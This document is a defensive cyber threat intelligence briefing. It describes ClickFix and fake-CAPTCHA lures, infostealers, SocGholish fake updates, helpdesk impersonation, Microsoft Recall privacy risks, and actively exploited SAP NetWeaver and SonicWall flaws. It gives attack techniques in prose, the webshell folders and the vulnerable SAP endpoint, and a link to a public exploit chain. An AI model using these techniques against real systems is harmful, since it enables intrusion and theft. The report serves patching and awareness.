Cyber Threat Intelligence Report

This week, we briefed our clients on threat actor tactics and techniques we are seeing this year with AI lowering the barrier of entry for cybercriminals.

 KEY TAKEAWAYS 

• Shields Up! ClickFix, FakeCaptcha, Infostealers, Fake Updates, Fake Helpdesk, and KEVs on the rise!

• Microsoft Recall released to the public, ensure it is disabled in your organization.

• Critical vulnerabilities in SAP and SonicWall under active exploitation. Patch now!

Shields Up!

It's no secret that cybersecurity threats are increasing across the board. Threat actors are continually inventing new tactics and techniques to compromise organizations. Widespread adoption of AI tools has lowered the barrier for entry for cybercriminals, and has also decreased the time it takes to weaponize exploits. In 2025, a handful of these techniques have emerged as serious threats that all organizations need to be aware of and defend against.

ClickFix/Fake CAPTCHA

These techniques are not necessarily new, and have been reported on many times by PacketWatch. However, they have become increasingly abused by a wider range of threat actors in recent months. While these techniques are technically different, they fit in the same category of threat as they all rely on tricking the user into loading malicious files themselves.

ClickFix attacks trick the user into believing there is an error with the webpage they are trying to view. In order to "fix" the problem, the user is told to open a command shell and copy/paste malicious PowerShell or JavaScript code and execute it. This code then downloads and executes the malicious payload. Users are directed to these sites via links embedded in phishing emails, or through watering-hole style attacks via SEO poisoning. This technique has been exploited by APT groups from North Korea, Iran, and Russia, as well as several ransomware groups.

FakeCaptcha attacks are very similar to ClickFix. The user is presented with a CAPTCHA page where they are prompted to open a command terminal and copy/paste malicious PowerShell or JavaScript code and execute it. This, in turn, downloads and executes further malicious payloads. In addition to ransomware, this infection method has also been documented to deliver another growing threat: Infostealers.

Infostealers

This type of malware is not new, however, there has been a steady rise in the use of this type of malware. In the recently published M-Trends 2025 report from Google, stolen credentials accounted for over 16% of initial infections. This is strongly tied to the proliferation of infostealer malware. Infostealers pose a significant challenge to enterprises due to the use of personal devices for work functions. Work credentials can be stolen if these credentials are stored in the personal device through browser synchronization. Infostealers are delivered to victims in a variety of ways. They are commonly bundled with cracked/pirated software but have been increasingly distributed through ClickFix/FakeCaptcha campaigns.

Fake Updates

One of the most notorious "Fake Update" malware campaigns is known as SocGholish. This "loader" malware has been observed since at least 2017. It is still one of the top initial infection methods today. Threat actors will compromise legitimate websites with malicious code that prompts the user to download updates to their web browser. These updates are bundled with malicious JavaScript code that facilitates the download and execution of further malicious payloads. Historically, SocGholish was known to download Cobalt Strike beacons to facilitate persistence after initial access, however, it has recently been observed leading directly to ransomware infections.

Fake IT / HelpDesk Support

A growing trend among threat actors is posing as IT support. These attacks involve the threat actor physically calling the victim, pretending to be from the company's IT department. Through this social engineering tactic, the threat actor convinces the victim to download remote access tools, giving the threat actor full control over the device. They then use this access to download further malicious payloads, many times leading to ransomware.

Increase in Known Exploited Vulnerabilities

A recent report from VulnCheck shows an increase in the total number of known exploited vulnerabilities in the first quarter of 2025. During this period, a total of 159 CVEs were publicly disclosed as exploited in the wild. Additionally, over 28% of these vulnerabilities were weaponized within 24 hours of vulnerability disclosure. Organizations need to take these timeframes into consideration with their patch management programs, especially for internet-facing edge devices. Ideally, these devices should be patched within 24 hours of CVE disclosure.

How to Defend Your Organization

Technical controls are obviously important. Having up-to-date EDR on every endpoint and server, staying fully patched, network segmentation, multi-factor authentication and strong passwords, network monitoring, rigid firewall and web gateway policies will all go a long way toward blocking and preventing many threats. However, a common thread with many of these emerging threats is threat actors are increasingly exploiting the human. User awareness training is a must. They must be made aware of these attack trends so they can avoid them if they are encountered. Additionally, administrators can take steps to limit the damage when humans inevitably make mistakes. Limit administrative roles and permissions for users, block access to unnecessary web content categories, disable command prompt or PowerShell usage, and only allow pre-approved software to be installed on workstations.

Resources:

• https://www.bleepingcomputer.com/news/security/interlock-ransomware-gang-pushes-fake-it-tools-in-clickfix-attacks/
  

• https://cybersecuritynews.com/clickfix-captcha-technique-ransomware/
  

• https://www.bleepingcomputer.com/news/security/state-sponsored-hackers-embrace-clickfix-social-engineering-tactic/
  

• https://thehackernews.com/2025/05/mintsloader-drops-ghostweaver-via.html
  

• https://www.darktrace.com/blog/socgholish-from-loader-and-c2-activity-to-ransomhub-deployment
  

• https://www.trendmicro.com/en_us/research/25/c/socgholishs-intrusion-techniques-facilitate-distribution-of-rans.html
  

• https://static1.squarespace.com/static/5e7b98a01e706156b68af914/t/680a6bb649ec895188ef7c7c/1745513399053/Luna+Moth+Advisory.pdf
  

• https://cybersecuritynews.com/lumma-stealer/
  

• https://packetwatch.com/resources/threat-intel/cyber-threat-intelligence-03-24-2025
  

• https://packetwatch.com/resources/threat-intel/cyber-threat-intelligence-03-10-2025
  

• https://packetwatch.com/resources/threat-intel/cyber-threat-intelligence-01-13-2025
  

• https://services.google.com/fh/files/misc/m-trends-2025-en.pdf
  

• https://vulncheck.com/blog/exploitation-trends-q1-2025
  

• https://thehackernews.com/2025/04/159-cves-exploited-in-q1-2025-283.html

Total Recall

On April 25, Microsoft announced the rollout of its controversial Recall feature to the general public. Recall continuously snapshots user activity, and leverages AI to allow the user to ask natural language questions about past actions on the computer. This allows the user to quickly find previous activities and past actions. Although Microsoft delayed the release of Recall for almost a year and added multiple safety features that were not included in the initial release, this feature is still a major privacy concern for organizations. Currently, Recall is an 'opt-in' feature, and only works on specific hardware. However, due to its privacy risks, it is recommended that administrators disable this feature via GPO.

Resources:

• https://support.microsoft.com/en-us/windows/retrace-your-steps-with-recall-aa03f8a0-a78b-4b3e-b0a1-2eb8ac48701c
  

• https://learn.microsoft.com/en-us/windows/client-management/manage-recall
  

• https://www.windowslatest.com/2025/04/28/disable-remove-recall-feature-in-windows-11/

Vulnerability Roundup

SAP Maximum Severity Vulnerability Under Active Exploitation

On April 25, SAP released a security update for CVE-2025-31324. This maximum severity vulnerability lies in the SAP NetWeaver Visual Composer versions 7.xx, and allows for unauthenticated file uploads which allows threat actors to take over the server. SAP has confirmed this vulnerability has been successfully exploited in attacks. Administrators are urged to patch as soon as possible.

In addition to patching, it is recommended to review server logs for unusual API requests to the '/developmentserver/metadatauploader' endpoint. In attacks observed so far, threat actors have typically uploaded webshells for the initial exploit. These files have been observed in the following folders on SAP servers:

• j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root
• j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work
• j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync

• https://redcanary.com/blog/threat-intelligence/cve-2025-31324/
  

• https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
  

• https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/
  

• https://www.bleepingcomputer.com/news/security/over-1-200-sap-netweaver-servers-vulnerable-to-actively-exploited-flaw/

SonicWall SMA100 Vulnerabilities Actively Exploited

On May 1, CISA added two vulnerabilities for the SonicWall Secure Mobile Access device to its Known Exploited Vulnerabilities (KEV) catalog. The two vulnerabilities are tracked as CVE-2023-44221 and CVE-2024-38475. The latter vulnerability, CVE-2024-38475, can lead to unauthorized access and session hijacking, and CVE-2023-44221 can lead to command injection if the attacker has administrative privileges. These vulnerabilities can be chained together to gain access to a logged-in administrator session and execute arbitrary commands.

Both vulnerabilities affect SMA 100 Series devices, including SMA 200, 210, 400, 410, and 500v. CVE-2023-44221 was addressed with version 10.2.1.10-62sv and higher on December 4, 2023. CVE-2024-38475 was addressed with version 10.2.1.14-75sv and higher on December 4, 2024. Proof-of-concept exploit code has been published. Administrators are urged to ensure they are fully patched against both vulnerabilities.

• https://thehackernews.com/2025/05/sonicwall-confirms-active-exploitation.html
• https://github.com/watchtowrlabs/watchTowr-vs-SonicWall-PreAuth-RCE-Chain
  
• https://www.cisa.gov/news-events/alerts/2025/05/01/cisa-adds-two-known-exploited-vulnerabilities-catalog

This report is provided FREE to the cybersecurity community.

Visit our Cyber Threat Intelligence Blog for additional reports.

Subscribe to be notified of future Reports:

NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.

DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.